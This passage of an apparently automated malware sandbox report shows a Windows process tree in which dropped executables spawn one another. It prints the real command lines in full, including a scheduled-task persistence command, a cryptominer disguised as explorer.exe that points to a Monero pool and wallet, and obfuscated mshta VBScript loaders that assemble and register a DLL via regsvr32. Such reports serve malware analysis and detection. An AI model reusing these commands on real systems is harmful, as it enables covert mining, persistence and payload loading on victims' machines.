                                                                              "C:\Users\Admin\AppData\Local\Temp\zhanglijuan-game.exe"
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              PID:2508
                                                                            • C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
                                                                              7⤵
                                                                                PID:1012
                                                                              • C:\Users\Admin\AppData\Local\Temp\chrome3.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\chrome3.exe"
                                                                                7⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:2280
                                                                                • C:\Windows\system32\WerFault.exe
                                                                                  C:\Windows\system32\WerFault.exe -u -p 2280 -s 1416
                                                                                  8⤵
                                                                                  • Program crash
                                                                                  • Suspicious behavior: GetForegroundWindowSpam
                                                                                  PID:2056
                                                                              • C:\Users\Admin\AppData\Local\Temp\Chrome5.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
                                                                                7⤵
                                                                                  PID:2948
                                                                                  • C:\Windows\System32\conhost.exe
                                                                                    "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
                                                                                    8⤵
                                                                                      PID:1756
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                        9⤵
                                                                                          PID:3644
                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                            schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                            10⤵
                                                                                            • Creates scheduled task(s)
                                                                                            PID:3676
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                          9⤵
                                                                                            PID:3840
                                                                                            • C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                              C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                              10⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:3900
                                                                                              • C:\Windows\System32\conhost.exe
                                                                                                "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                11⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of SetThreadContext
                                                                                                PID:3348
                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                  "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                  12⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:2884
                                                                                                  • C:\Windows\System32\conhost.exe
                                                                                                    "C:\Windows\System32\conhost.exe" "/sihost64"
                                                                                                    13⤵
                                                                                                      PID:2956
                                                                                                  • C:\Windows\explorer.exe
                                                                                                    C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth
                                                                                                    12⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:2640
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c Mon17a0d8ec302e.exe
                                                                                    4⤵
                                                                                    • Loads dropped DLL
                                                                                    PID:1332
                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon17a0d8ec302e.exe
                                                                                      Mon17a0d8ec302e.exe
                                                                                      5⤵
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      • Checks SCSI registry key(s)
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                      PID:2104
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c Mon17332e41e6b.exe
                                                                                    4⤵
                                                                                      PID:1624
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c Mon1708beae021a5ff.exe
                                                                                      4⤵
                                                                                        PID:1116
                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon1708beae021a5ff.exe
                                                                                  Mon1708beae021a5ff.exe
                                                                                  1⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:2040
                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon17332e41e6b.exe
                                                                                  Mon17332e41e6b.exe
                                                                                  1⤵
                                                                                  • Executes dropped EXE
                                                                                  • Modifies system certificate store
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:2088
                                                                                  • C:\Users\Admin\AppData\Roaming\874733.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\874733.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:3068
                                                                                  • C:\Users\Admin\AppData\Roaming\5117413.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\5117413.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Checks BIOS information in registry
                                                                                    • Checks whether UAC is enabled
                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                    PID:1080
                                                                                  • C:\Users\Admin\AppData\Roaming\5880355.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\5880355.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Checks BIOS information in registry
                                                                                    • Checks whether UAC is enabled
                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                    PID:2060
                                                                                  • C:\Users\Admin\AppData\Roaming\2103771.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\2103771.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:2312
                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                      "C:\Windows\System32\mshta.exe" VBSCRIPt: cLOsE ( CrEATeoBjEcT ( "wsCrIpt.sHelL" ). RUn ("cmd /C copy /y ""C:\Users\Admin\AppData\Roaming\2103771.exe"" LYCw0J.ExE && stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF """" == """" for %T in ( ""C:\Users\Admin\AppData\Roaming\2103771.exe"") do taskkill /im ""%~nxT"" /f " , 0 , tRue ) )
                                                                                      3⤵
                                                                                        PID:2952
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Roaming\2103771.exe" LYCw0J.ExE && stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF "" == "" for %T in ( "C:\Users\Admin\AppData\Roaming\2103771.exe") do taskkill /im "%~nxT" /f
                                                                                          4⤵
                                                                                            PID:968
                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                              taskkill /im "2103771.exe" /f
                                                                                              5⤵
                                                                                              • Kills process with taskkill
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:2740
                                                                                            • C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE
                                                                                              LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj
                                                                                              5⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:2264
                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                "C:\Windows\System32\mshta.exe" VBSCRIPt: cLOsE ( CrEATeoBjEcT ( "wsCrIpt.sHelL" ). RUn ("cmd /C copy /y ""C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE"" LYCw0J.ExE && stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF ""/ptCSVoYGd9AYAP_3p6Sjuyj "" == """" for %T in ( ""C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE"") do taskkill /im ""%~nxT"" /f " , 0 , tRue ) )
                                                                                                6⤵
                                                                                                  PID:2924
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE" LYCw0J.ExE && stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF "/ptCSVoYGd9AYAP_3p6Sjuyj " == "" for %T in ( "C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE") do taskkill /im "%~nxT" /f
                                                                                                    7⤵
                                                                                                      PID:972
                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                    "C:\Windows\System32\mshta.exe" vbSCrIPt: cLOsE (cREAteoBject ( "wscRIPT.SHELl" ). Run ( "C:\Windows\system32\cmd.exe /q /r ECho L%Time%07> 2B_LH.IT & EcHO | SEt /P = ""MZ"" > RqS~WQ.qCt& copY /Y /b RqS~WQ.QCt + WL4sXR.MY + JkOFKWNK.Eo7 + 2B_LH.IT BGG1KxA.y & DEl WL4sxR.My JkOFkWNk.EO7 2B_LH.IT RQS~WQ.QCT& stArT regsvr32 .\BgG1KXA.y -U -S " ,0 , TRUe ) )
                                                                                                    6⤵
                                                                                                      PID:2516
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        "C:\Windows\system32\cmd.exe" /q /r ECho L%Time> 2B_LH.IT & EcHO | SEt /P = "MZ" > RqS~WQ.qCt& copY /Y /b RqS~WQ.QCt + WL4sXR.MY + JkOFKWNK.Eo7 + 2B_LH.IT BGG1KxA.y & DEl WL4sxR.My JkOFkWNk.EO7 2B_LH.IT RQS~WQ.QCT& stArT regsvr32 .\BgG1KXA.y -U -S
                                                                                                        7⤵
                                                                                                          PID:2092
                                                                                              • C:\Users\Admin\AppData\Roaming\8279270.exe
                                                                                                "C:\Users\Admin\AppData\Roaming\8279270.exe"
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Adds Run key to start application
                                                                                                PID:2380
                                                                                                • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                  "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                  3⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:2752
                                                                                              • C:\Users\Admin\AppData\Roaming\984612.exe
                                                                                                "C:\Users\Admin\AppData\Roaming\984612.exe"
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:2700
                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon1708beae021a5ff.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon1708beae021a5ff.exe"
                                                                                              1⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:2068
                                                                                            • C:\Windows\system32\conhost.exe
                                                                                              \??\C:\Windows\system32\conhost.exe "-20875194842143689969485825998-512177443-138272461726246300-6505230801793941740"
                                                                                              1⤵
                                                                                              • Loads dropped DLL
                                                                                              PID:1624
                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                              C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
                                                                                              1⤵
                                                                                              • Executes dropped EXE
                                                                                              • Loads dropped DLL
                                                                                              PID:2388
                                                                                            • C:\Windows\system32\taskeng.exe
                                                                                              taskeng.exe {98B603D5-E31A-4583-843F-DD67E518C58F} S-1-5-18:NT AUTHORITY\System:Service:
                                                                                              1⤵
                                                                                                PID:3124
                                                                                              • C:\Windows\system32\taskeng.exe
                                                                                                taskeng.exe {93229302-5279-4544-B7F4-CDC5E71272E8} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
                                                                                                1⤵
                                                                                                  PID:3188
                                                                                                  • C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                                                                                                    "C:\Program Files\Mozilla Firefox\default-browser-agent.exe" do-task
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:1012
                                                                                                  • C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                    C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Checks SCSI registry key(s)
                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                    PID:1140
                                                                                                  • C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                    C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Checks SCSI registry key(s)
                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                    PID:2172
                                                                                                  • C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                    C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Checks SCSI registry key(s)
                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                    PID:1140
                                                                                                • C:\Windows\system32\taskeng.exe
                                                                                                  taskeng.exe {5F11827C-6BF5-4E48-A47E-3A13BECC281C} S-1-5-18:NT AUTHORITY\System:Service:
                                                                                                  1⤵
                                                                                                    PID:3628
                                                                                                  • C:\Windows\system32\taskeng.exe
                                                                                                    taskeng.exe {25261586-629D-4DD4-9DA4-041F16E328E1} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
                                                                                                    1⤵
                                                                                                      PID:3964
                                                                                                      • C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                        C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                        2⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Checks SCSI registry key(s)
                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                        PID:4016
                                                                                                    • C:\Windows\system32\taskeng.exe
                                                                                                      taskeng.exe {16B62CD1-31FF-468E-8CF2-FBE49D443360} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
                                                                                                      1⤵
                                                                                                        PID:3400
                                                                                                        • C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                          C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                          2⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Checks SCSI registry key(s)
                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                          PID:3248
                                                                                                      • C:\Windows\system32\taskeng.exe
                                                                                                        taskeng.exe {D6DDC036-09A5-4E2F-AC8D-D48829740FB1} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
                                                                                                        1⤵
                                                                                                          PID:1736
                                                                                                          • C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                            C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Checks SCSI registry key(s)
                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                            PID:644
                                                                                                        • C:\Windows\system32\taskeng.exe
                                                                                                          taskeng.exe {15782991-04F1-4C4A-843F-1A36E1185C8A} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
                                                                                                          1⤵
                                                                                                            PID:4068
                                                                                                            • C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                              C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Checks SCSI registry key(s)
                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                              PID:3084
                                                                                                          • C:\Windows\system32\taskeng.exe
                                                                                                            taskeng.exe {638F770F-6D7F-4184-9ACE-DA2F9A6CF897} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
                                                                                                            1⤵
                                                                                                              PID:2836
                                                                                                              • C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                                C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                                2⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                PID:2296
                                                                                                            • C:\Windows\system32\taskeng.exe
                                                                                                              taskeng.exe {C7C72A88-A2BF-42C4-9D3A-75BD2AA2AC72} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
                                                                                                              1⤵
                                                                                                                PID:1980
                                                                                                                • C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                                  C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                                  2⤵
                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                  PID:2464
                                                                                                              • C:\Windows\system32\taskeng.exe
                                                                                                                taskeng.exe {A56FC159-36EC-4861-85ED-BC6DEE3C8E7C} S-1-5-18:NT AUTHORITY\System:Service:
                                                                                                                1⤵
                                                                                                                  PID:1840
                                                                                                                • C:\Windows\system32\taskeng.exe
                                                                                                                  taskeng.exe {61B64691-1E55-43C0-96E1-382786A59E6E} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
                                                                                                                  1⤵
                                                                                                                    PID:3492
                                                                                                                    • C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                                      C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                                      2⤵
                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                      PID:1012
                                                                                                                  • C:\Windows\system32\taskeng.exe
                                                                                                                    taskeng.exe {5018FD7C-8B43-4CD4-AC65-CF5DB131AF74} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
                                                                                                                    1⤵
                                                                                                                      PID:2968
                                                                                                                      • C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                                        C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                                        2⤵
                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                        PID:1884
                                                                                                                    • C:\Windows\system32\taskeng.exe
                                                                                                                      taskeng.exe {4A1EBE3E-00B8-41CA-93F5-B3908D4537F0} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
                                                                                                                      1⤵
                                                                                                                        PID:3192
                                                                                                                        • C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                                          C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                                          2⤵
                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                          PID:3660
                                                                                                                      • C:\Windows\system32\taskeng.exe
                                                                                                                        taskeng.exe {B3456DBF-B0E4-4373-80A8-4589B5E0031B} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
                                                                                                                        1⤵
                                                                                                                          PID:2796
                                                                                                                          • C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                                            C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                                            2⤵
                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                            PID:4000
                                                                                                                        • C:\Windows\system32\taskeng.exe
                                                                                                                          taskeng.exe {B35F0E3F-937C-47C9-834B-CEDE14CF36D5} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
                                                                                                                          1⤵
                                                                                                                            PID:2836
                                                                                                                            • C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                                              C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                                              2⤵
                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                              PID:3676
                                                                                                                          • C:\Windows\system32\taskeng.exe
                                                                                                                            taskeng.exe {57E56F9D-04AB-414C-9029-43B63A18E75F} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
                                                                                                                            1⤵
                                                                                                                              PID:3796
                                                                                                                              • C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                                                C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                                                2⤵
                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                PID:4076
                                                                                                                            • C:\Windows\system32\taskeng.exe
                                                                                                                              taskeng.exe {DB835538-06A1-4EFC-8BE7-BB0AE551FC9F} S-1-5-18:NT AUTHORITY\System:Service:
                                                                                                                              1⤵
                                                                                                                                PID:3200
                                                                                                                              • C:\Windows\system32\taskeng.exe
                                                                                                                                taskeng.exe {D7F9AAC5-A576-4170-9807-0AB5011F789F} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
                                                                                                                                1⤵
                                                                                                                                  PID:3756
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                                                    C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                                                    2⤵
                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                    PID:3776
                                                                                                                                • C:\Windows\system32\taskeng.exe
                                                                                                                                  taskeng.exe {8375E967-C4DD-45CB-9E31-5F1A92AE1329} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
                                                                                                                                  1⤵
                                                                                                                                    PID:2168
                                                                                                                                    • C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                                                      C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                                                      2⤵
                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                      PID:1564
                                                                                                                                  • C:\Windows\system32\taskeng.exe
                                                                                                                                    taskeng.exe {63AADEB4-2456-46CC-ACB2-74ADD86E49CD} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
                                                                                                                                    1⤵
                                                                                                                                      PID:4084
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                                                        C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                                                        2⤵
                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                        PID:2940
                                                                                                                                    • C:\Windows\system32\taskeng.exe
                                                                                                                                      taskeng.exe {7C9BD4D8-7328-4E39-92C4-A5B8B6EF63B7} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
                                                                                                                                      1⤵
                                                                                                                                        PID:2412
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                                                          C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                                                          2⤵
                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                          PID:3392
                                                                                                                                      • C:\Windows\system32\taskeng.exe
                                                                                                                                        taskeng.exe {7C1FAC83-4458-4E9D-A51D-C89D29A92C18} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
                                                                                                                                        1⤵
                                                                                                                                          PID:3628
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                                                            C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                                                            2⤵
                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                            PID:3704
                                                                                                                                        • C:\Windows\system32\taskeng.exe
                                                                                                                                          taskeng.exe {CF1C30FD-53CE-4553-B0E3-539EBEC9DC59} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
                                                                                                                                          1⤵
                                                                                                                                            PID:1800
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                                                              C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                                                              2⤵
                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                              PID:3048
                                                                                                                                          • C:\Windows\system32\taskeng.exe
                                                                                                                                            taskeng.exe {D9E54739-DB3B-41CD-A0E6-01CE3F44C6DA} S-1-5-18:NT AUTHORITY\System:Service:
                                                                                                                                            1⤵
                                                                                                                                              PID:3880
                                                                                                                                            • C:\Windows\system32\taskeng.exe
                                                                                                                                              taskeng.exe {652FEA32-933E-4FFB-9F98-BEC3CA0E1A1B} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
                                                                                                                                              1⤵
                                                                                                                                                PID:1732
                                                                                                                                                • C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                                                                  C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                                                                  2⤵
                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                  PID:1428
                                                                                                                                              • C:\Windows\system32\taskeng.exe
                                                                                                                                                taskeng.exe {9EE3FE26-7615-4045-B9EF-4A3797C6EC83} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
                                                                                                                                                1⤵
                                                                                                                                                  PID:288
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                                                                    C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                                                                    2⤵
                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                    PID:3400
                                                                                                                                                • C:\Windows\system32\taskeng.exe
                                                                                                                                                  taskeng.exe {ED9CC874-895D-4197-AAFD-E6CCC28C90C6} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
                                                                                                                                                  1⤵
                                                                                                                                                    PID:3448
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                                                                      C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                                                                      2⤵
                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                      PID:3376
                                                                                                                                                  • C:\Windows\system32\taskeng.exe
                                                                                                                                                    taskeng.exe {4B1B4172-589D-41D1-9EB5-B44A1955BE56} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
                                                                                                                                                    1⤵
                                                                                                                                                      PID:932
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                                                                        C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                                                                        2⤵
                                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                        PID:980
                                                                                                                                                    • C:\Windows\system32\taskeng.exe
                                                                                                                                                      taskeng.exe {EEE89443-DF06-47DF-8BF0-C9F60092992C} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
                                                                                                                                                      1⤵
                                                                                                                                                        PID:3892
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                                                                          C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                                                                          2⤵
                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                          PID:3428
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                                                                          C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                                                                          2⤵
                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                          PID:456
                                                                                                                                                      • C:\Windows\system32\taskeng.exe
                                                                                                                                                        taskeng.exe {2F1FD8BF-EB20-46C9-A87F-8225FB998761} S-1-5-18:NT AUTHORITY\System:Service:
                                                                                                                                                        1⤵
                                                                                                                                                          PID:1840
                                                                                                                                                        • C:\Windows\system32\taskeng.exe
                                                                                                                                                          taskeng.exe {A5DF1694-DFD9-4214-99CD-048E1FC676CB} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
                                                                                                                                                          1⤵
                                                                                                                                                            PID:2068
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                                                                              C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                                                                              2⤵
                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                              PID:2124
                                                                                                                                                          • C:\Windows\system32\taskeng.exe
                                                                                                                                                            taskeng.exe {73AF0BD6-5329-41F4-8DB3-66D83F98098C} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
                                                                                                                                                            1⤵
                                                                                                                                                              PID:3556
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                                                                                C:\Users\Admin\AppData\Roaming\rectthb
                                                                                                                                                                2⤵
                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                • Suspicious behavior: MapViewOfSection
